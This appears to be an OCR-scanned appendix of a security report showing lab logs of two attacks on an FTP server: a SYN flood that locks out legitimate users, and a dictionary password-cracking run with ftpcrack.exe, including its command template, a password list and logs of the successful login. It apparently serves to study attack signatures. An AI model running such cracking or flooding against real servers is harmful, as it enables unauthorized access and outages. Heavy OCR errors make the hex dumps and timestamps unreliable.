09:37:13.039712  IP  192.168.131.131.1045  >  192.168.130.135.21: 
09:37:13.039756  IP  192.168.130.135.21  >  192.168.131.131.1045: 
09:37:13.040123  IP  192.168.131.131.1046  >  192.168.130.135.21 : 
09:37:13.040140  IP  192.168.130.135.21  >  192.168.131.131.1046: 
09:37:13.040525  IP  192.168.131.131.1047  >  192.168.130.135.21: 
09:37:13.040542  IP  192.168.130.135.21  >  192.168.131.131.1047: 
09:37:13.046819  IP  192.168.131.131.1048  >  192.168.130.135.21: 
09:37:13.046874  IP  192.168.130.135.21  >  192.168.131.131.1048: 
09:37:13.052612  IP  192.168.131.131.1049  >  192.168.130.135.21: 
09:37:13.052687  IP  192.168.130.135.21  >  192.168.131.131.1049: 
09:37:13.058403  IP  192.168.131.131.1050  >  192.168.130.135.21: 
09:37:13.058467  IP  192.168.130.135.21  >  192.168.131.131.1050: 

During  attack,  legal  users  cannot  connect  to  the  ftp  server: 


S  1536030444:1536030444(0)  ack  58071  win 

S  94370:94370(0)  win  1024 
S  1536070386:1536070386(0)  ack  94371  win 

S  112710:112710(0)  win  1024 
S  1536119311:1536119311(0)  ack  112711 

S  161650:161650(0)  win  1024 
S  1536154995:1536154995(0)  ack  161651 

S  130070:130070(0)  win  1024 
R  0:0(0)  ack  130071  win  0 
S  154205:154205(0)  win  1024 
R  0:0(0)  ack  154206  win  0 
S  41720:41720(0)  win  1024 
R  0:0(0)  ack  41721  win  0 
S  26365:26365(0)  win  1024 
R  0:0(0)  ack  26366  win  0 
S  10465:10465(0)  win  1024 
R  0:0(0)  ack  10466  win  0 
S  82685:82685(0)  win  1024 
R  0:0(0)  ack  82686  win  0 
S  30770:30770(0)  win  1024 
R  0:0(0)  ack  30771  win  0 
S  42270:42270(0)  win  1024 
R  0:0(0)  ack  42271  win  0 
S  127795:127795(0)  win  1024 
R  0:0(0)  ack  127796  win  0 
S  39745:39745(0)  win  1024 
R  0:0(0)  ack  39746  win  0 
S  96805:96805(0)  win  1024 
R  0:0(0)  ack  96806  win  0 
S  61045:61045(0)  win  1024 
R  0:0(0)  ack  61046  win  0 
S  154610:154610(0)  win  1024 
R  0:0(0)  ack  154611  win  0 
S  130010:130010(0)  win  1024 
R  0:0(0)  ack  130011  win  0 
S  19430:19430(0)  win  1024 
R  0:0(0)  ack  19431  win  0 
S  53685:53685(0)  win  1024 
R  0:0(0)  ack  53686  win  0 
S  36575:36575(0)  win  1024 
R  0:0(0)  ack  36576  win  0 
S  39490:39490(0)  win  1024 
R  0:0(0)  ack  39491  win  0 
S  123765:123765(0)  win  1024 
R  0:0(0)  ack  123766  win  0 
S  158210:158210(0)  win  1024 
R  0:0(0)  ack  158211  win  0 
S  33645:33645(0)  win  1024 
R  0:0(0)  ack  33646  win  0 


77ic  fragment  of  FTP -sender’s  log: 
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[5]  Fri  18Mar03  09:37:13 

[6]  Fri  18Mar03  09:37:13 

[5]  Fri  18Mar03  09:37:13 

[6]  Fri  18Mar03  09:37:13 
[5]  Fri  18Mar03  09:37:13 

[5]  Fri  1 8Mar03  09:37:13 

[6]  Fri  18Mar03  09:37:13 
[5]  Fri  18Mar03  09:37:13 
[5]  Fri  18Mar03  09:37:13 

[5]  Fri  18Mar03  09:37:13 

[6]  Fri  18Mar03  09:37:13 

[5]  Fri  18Mar03  09:37:13 

[6]  Fri  18Mar03  09:37:13 
[5]  Fri  18Mar03  09:37:13 
[5]  Fri  18Mar03  09:37:13 


(024093)  Connected  to  192.168.131.131  (Local  address  192.168.130.135) 
(024093)  220  Serv-U  FTP  Server  v4. 1  for  WinSock  ready... 

(024094)  Connected  to  192.168.131.131  (Local  address  192.168.130.135) 
(024094)  220  Serv-U  FTP  Server  v4. 1  for  WinSock  ready... 

(024093)  Closing  connection 

(024095)  Connected  to  192.168.131.131  (Local  address  192.168.130.135) 
(024095)  220  Serv-U  FTP  Server  v4. 1  for  WinSock  ready... 

(024094)  Closing  connection 
(024095)  Closing  connection 

(024096)  Connected  to  192.168.131.131  (Local  address  192.168.130.135) 
(024096)  220  Serv-U  FTP  Server  v4.1  for  WinSock  ready... 

(024097)  Connected  to  192.168.131.131  (Local  address  192.168.130.135) 
(024097)  220  Serv-U  FTP  Server  v4. 1  for  WinSock  ready... 

(024096)  Closing  connection 
(024097)  Closing  connection 


A4.2 3.  Fragments  of  logs  for  program  ftpcrack.exe  execution 


The  program  ftpcrackexe  is  intended  for  Password  Cracking  (PC)  attack  generation. 
Template  for  calling  the  program  is  as  follows: 

ftpcrackexe  -d  ip. ip. ip. ip. host  -u  username  -f filename 


where 

ip. ip. ip. ip. ho st-  destination  host  address  and  port  (with  ftp-server); 

username  -  user’s  login  name; 

filename  -  filename  with  dictionary  of  passwords. 


Let  us  assume  that: 

•  the  malefactor’s  target  host  is  a  ftp-server  having  IP-address  192.168.130.136 ; 

•  the  malefactor  knows  that  the  ftp-server  has  the  user  with  login  name  “cmt/n”; 

•  the  malefactor  possesses  the  file  passwords,  txt  with  the  list  of  “standard”  passwords: 

A&M 

A&P 

AAA 

AAAS 

elysian 

em 

emaciate 

emacs 

eman  <-  this  is  a  real  password  of  the  user  “eman” 

emanate 

emancipate 

emasculate 

embalm 


zooplankton 

zounds 

zucchini 

zygote 


Therefore  the  malefactor  starts  this  program  with  the  following  arguments: 

ftpcrackexe  -d  192.168.130.135.21  -u  eman-fpasswords.txt 

The  fragment  of  client  host  log: 

Starting  ftpcrack  v.1.0 
Connecting... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4. 1  for  WinSock  ready... 
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Send:  USER  eman 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  A&M 
Reply:  530  Not  logged  in. 

Bad  password! 

Connecting... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4. 1  for  WinSock  ready... 

Send:  USER  eman 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  A&P 
Reply:  530  Not  logged  in. 

Bad  password! 


Connecting... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  WinSock  ready... 

Send:  USER  eman 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  emaciate 
Reply:  530  Not  logged  in. 

Bad  password! 

Connecting... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  WinSock  ready... 

Send:  USER  eman 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  emacs 
Reply:  530  Not  logged  in. 

Bad  password! 

Connecting... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  WinSock  ready... 

Send:  USER  eman 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  eman 

Reply:  230  User  logged  in.  proceed. 

SUCCESS!  Use  this  account  and  password  for  access  to  ftp-server: 
USERNAME:  eman 
PASSWD:  eman 


Tire  fragment  of  FTP-server’s  log: 

[5]  Fri  07Mar03  11:42:25  -  (024044) 

[6]  Fri  07Mar03  1 1:42:25  -  (024044) 

[5]  Fri  07Mar03  1 1:42:25  -  (024044) 
[2]  Fri  07Mar03  1 1:42:25  -  (024044) 

[6]  Fri  07Mar03  1 1:42:25  -  (024044) 
[2]  Fri  07Mar03  1 1:42:25  -  (024044) 
[6]  Fri  07Mar03  1 1:42:25  -  (024044) 
[5]  Fri  07Mar03  1 1:42:25  -  (024044) 

[5]  Fri  07Mar03  11:42:25  -  (024045) 

[6]  Fri  07Mar03  1 1:42:25  -  (024045) 

[5]  Fri  07Mar03  1 1:42:25  -  (024045) 
[2]  Fri  07Mar03  1 1:42:25  -  (024045) 

[6]  Fri  07Mar03  11:42:25  -  (024045) 
[2]  Fri  07Mar03  1 1:42:25  -  (024045) 
[6]  Fri  07Mar03  1 1:42:25  -  (024045) 
[5]  Fri  07Mar03  11:42:25  -  (024045) 

[5]  Fri  07Mar03  1 1:42:25  -  (024046) 

[6]  Fri  07Mar03  1 1:42:25  -  (024046) 


Connected  to  192.168.130.136  (Local  address  192.168.130.135) 
220  Serv-U  FTP  Server  v4. 1  for  WinSock  ready... 

IP-Name:  HACKER 
USER  eman 

331  User  name  okay,  need  password. 

PASS  xxxxx 
530  Not  logged  in. 

Closing  connection 

Connected  to  192.168.130.136  (Local  address  192.168.130.135) 
220  Serv-U  FTP  Server  v4. 1  for  WinSock  ready... 

IP-Name:  HACKER 
USER  eman 

331  User  name  okay,  need  password. 

PASS  xxxxx 
530  Not  logged  in. 

Closing  connection 

Connected  to  192.168.130.136  (Local  address  192.168.130.135) 
220  Serv-U  FTP  Server  v4. 1  for  WinSock  ready... 
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[5]  Fri  07Mar03  11:42:25  -  (024046)  IP-Name:  HACKER 
[2]  Fri  07Mar03  1 1:42:25  -  (024046)  USER  eman 

[6]  Fri  07Mar03  11:42:25  -  (024046)  331  User  name  okay,  need  password. 
[2]  Fri  07Mar03  1 1 :42:25  -  (024046)  PASS  xxxxx 

[6]  Fri  07Mar03  1 1:42:25  -  (024046)  530  Not  logged  in. 

[5]  Fri  07Mar03  11:42:25  -  (024046)  Closing  connection 


[5]  Fri  07Mar03  1 1:42:25  -  (024047)  Connected  to  192.168.130.136  (Local  address  192.168.130.135) 

[6]  Fri  07Mar03  1 1 :42:25  -  (024047)  220  Serv-U  FTP  Server  v4. 1  for  WinSock  ready... 

[5]  Fri  07Mar03  11:42:25  -  (024047)  IP-Name:HACKER 
[2]  Fri  07Mar03  1 1:42:25  -  (024047)  USER  eman 

[6]  Fri  07Mar03  11:42:25  -  (024047)  331  User  name  okay,  need  password. 

[2]  Fri  07Mar03  1 1:42:25  -  (024047)  PASS  xxxxx 

[5]  Fri  07Mar03  1 1:42:25  -  (024047)  User  EMAN  logged  in 

[6]  Fri  07Mar03  1 1:42:25  -  (024047)  230  User  logged  in,  proceed. 

Tire  fragment  oflogforftpcrackexe  network  packets: 

11:42:25.153230  IP  192.168.130.136.2367  >  192.168.130.135.21:  S  4164059962:4164059962(0)  win  64240  <mss 
1460,nop,nop,sackOK>  (DF) 

0x0000  4500  0030  87ea  4000  8006  5ebd  OaOO  0015  E..0..@...A 

0x0010  OaOO  000c  093f0015f832  833a  0000  0000  . ?...2.:..„ 

0x0020  7002  fafO  ef4c  0000  0204  05b4  0101  0402  p....L . 

11:42:25.153317  IP  192.168.130.135.21  >  192.168.130.136.2367:  S  1864989020:1864989020(0)  ack  4164059963 
win  64240  <mss  1460,nop,nop,sackOK>  (DF) 

0x0000  4500  0030  6ea2  4000  c806  3005  OaOO  000c  E..0n.@...0 . 

0x0010  OaOO  0015  0015  093f  6f29  795c  f832  833b  . ?o)y\.2.; 

0x0020  7012  fafO  06b6  0000  0204  05b4  0101  0402  p . 

11:42:25.153467  IP  192.168.130.136.2367  >  192.168.130.135.21:  .  ack  1  win  64240  (DF) 

0x0000  4500  0028  87eb  4000  8006  5ec4  OaOO  0015  E..(..@...A . 

0x0010  OaOO  000c  093f0015f832  833b  6f29  795d  . ?...2.;o)y] 

0x0020  5010  fafO  337a  0000  0204  05b4  0101  P...3z . 

11:42:25.164874  IP  192.168.130.135.21  >  192.168.130.136.2367:  P  1:50(49)  ack  1  win  64240  (DF) 

0x0000  4500  0059  6ea3  4000  c806  2fdb  OaOO  000c  E..Yn.@.../ . 

0x0010  OaOO  0015  0015  093f6f29  795df832  833b  . ?o)y].2.; 

0x0020  5018  fafO  3575  0000  3232  3020  5365  7276  P...5u..220.Serv 

0x0030  2d55  2046  5450  2053  6572  7665  7220  7634  -U.FTP.Server.v4 

0x0040  2e3 1  2066  6f72  2057  696e  536f  636b  2072  . 1  .for.WinSock.r 

0x0050  6561  ea 

11:42:25.167699  IP  192.168.130.136.2367  >  192.168.130.135.21:  P  1:13(12)  ack  50  win  64191  (DF) 

0x0000  4500  0034  87ec  4000  8006  5eb7  OaOO  0015  E..4..@...A . 

0x0010  OaOO  000c  093f0015f832  833b  6f29  798e  . ?...2.;o)y. 

0x0020  5018  fabf8fcf0000  5553  4552  2065  6d61  P . USER.ema 

0x0030  6e20  OdOa  n... 

11:42:25.175986  IP  192.168.130.135.21  >  192.168.130.136.2367:  P  50:86(36)  ack  13  win  64228  (DF) 

0x0000  4500  004c  6ea4  4000  c806  2fe7  OaOO  000c  E..Ln.@.../ . 

0x0010  OaOO  0015  0015  093f  6f29  798e  f832  8347  . ?o)y..2.G 

0x0020  5018  fae4  8613  0000  3333  3120  5573  6572  P . 331.User 

0x0030  206e  616d  6520  6f6b  6179  2c20  6e65  6564  .name. okay, .need 

0x0040  2070  6173  7377  6f72  642e  OdOa  .password... 

11:42:25.178484  IP  192.168.130.136.2367  >  192.168.130.135.21:  P  13:24(11)  ack  86  win  64155  (DF) 

0x0000  4500  0033  87ed  4000  8006  5eb7  OaOO  0015  E..3..@..  A . 

0x0010  OaOO  000c  093f0015f832  8347  6f29  79b2  . ?...2.Go)y. 

0x0020  5018  fa9b  lf2b  0000  5041  5353  2041  264d  P....+..PASS.A&M 

0x0030  200d  0a 

11:42:25.187847  IP  192.168.130.135.21  >  192.168.130.136.2367:  P  86:106(20)  ack  24  win  64217  (DF) 

0x0000  4500  003c  6ea5  4000  c806  2ff6  OaOO  000c  E..<n.@.../ . 

0x0010  OaOO  0015  0015  093f6f29  79b2f832  8352  . ?o)y..2.R 

0x0020  5018  fad9  3649  0000  3533  3020  4e6f  7420  P...6I..530.Not. 

0x0030  6c6f  6767  6564  2069  6e2e  OdOa  logged.in... 

11:42:30.033413  IP  192.168.130.136.2434  >  192.168.130.135.21:  S  4168608977:4168608977(0)  win  64240  <mss 
1460,nop,nop,sackOK>  (DF) 

0x0000  4500  0030  89af4000  8006  5cf8  OaOO  0015  E..0..@...\ . 
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0x0010  OaOO  000c  0982  001 5  f877  ecd  1  0000  0000  . w . 

0x0020  7002  fafO  852d  0000  0204  05b4  0101  0402  p....- . 

11:42:30.033459  IP  192.168.130.135.21  >  192.168.130.136.2434:  S  1869526539:1869526539(0)  ack  4168608978 
win  64240  <mss  1460,nop,nop,sackOK>  (DF) 

0x0000  4500  0030  706f  4000  c806  2e38  OaOO  000c  E..0po@....8.... 

0x0010  OaOO  0015  0015  0982  6f6e  b60b  f 877  ecd2  . on...w.. 

0x0020  7012  fafO  5fa2  0000  0204  05b4  0101  0402  p..._ . 

11:42:30.033608  IP  192.168.130.136.2434  >  192.168.130.135.21:  .  ack  1  win  64240  (DF) 

0x0000  4500  0028  89b0  4000  8006  5cff  OaOO  0015  E..(..@...\ . 

0x0010  OaOO  000c  0982  0015  f877  ecd2  6f6e  b60c  . w..on.. 

0x0020  5010  fafO  8c66  0000  0204  05b4  0101  P....f . 

11:42:30.043183  IP  192.168.130.135.21  >  192.168.130.136.2434:  P  1:50(49)  ack  1  win  64240  (DF) 

0x0000  4500  0059  7070  4000  c806  2e0e  OaOO  000c  E..Ypp@ . 

0x0010  OaOO  0015  0015  0982  6f6eb60cf877ecd2  . on...w.. 

0x0020  5018  fafO  8e61  0000  3232  3020  5365  7276  P....a..220.Serv 

0x0030  2d55  2046  5450  2053  6572  7665  7220  7634  -U.FTP.Server.v4 

0x0040  2e3 1  2066  6f72  2057  696e  536f  636b  2072  . 1  .for.WinSock.r 

0x0050  6561  ea 

11:42:30.053300  IP  192.168.130.136.2434  >  192.168.130.135.21:  P  1:13(12)  ack  50  win  64191  (DF) 

0x0000  4500  0034  89bl  4000  8006  5cf2  OaOO  0015  E..4..@...\ . 

0x0010  OaOO  000c  0982  0015  f877  ecd2  6f6e  b63d  . w..on.= 

0x0020  5018  fabfe8bb  0000  5553  4552  2065  6d61  P . USER.ema 

0x0030  6e20  OdOa  n... 

11:42:30.061772  IP  192.168.130.135.21  >  192.168.130.136.2434:  P  50:86(36)  ack  13  win  64228  (DF) 

0x0000  4500  004c  7071  4000  c806  2ela  OaOO  000c  E..Lpq@ . 

0x0010  OaOO  0015  0015  0982  6f6eb63df877ecde  . on.=.w.. 

0x0020  5018  fae4deff0000  3333  3120  5573  6572  P . 331.User 

0x0030  206e  616d  6520  6f6b  6179  2c20  6e65  6564  ,name.okay,.need 

0x0040  2070  6173  7377  6f72  642e  OdOa  .password... 

11:42:30.071091  IP  192.168.130.136.2434  >  192.168.130.135.21:  P  13:25(12)  ack  86  win  64155  (DF) 

0x0000  4500  0034  89b2  4000  8006  5cfl  OaOO  0015  E..4..@...\ . 

0x0010  OaOO  000c  0982  0015  f877  ecde  6f6e  b661  . w..on.a 

0x0020  5018  fa9bdfc0  0000  5041  5353  2065  6d61  P . PASS.ema 

0x0030  6e20  OdOa  n... 

11:42:30.090595  IP  192.168.130.135.21  >  192.168.130.136.2434:  P  86:116(30)  ack  25  win  64216  (DF) 

0x0000  4500  0046  7073  4000  c806  2ele  OaOO  000c  E..Fps@ . 

0x0010  OaOO  0015  0015  0982  6f6e  b661  f877  ecea  . on.a.w.. 

0x0020  5018  fad8c756  0000  3233  3020  5573  6572  P....V..230.User 

0x0030  206c  6f67  6765  6420  696e  2c20  7072  6f63  ,logged.in,.proc 

0x0040  6565  642e  OdOa  eed... 
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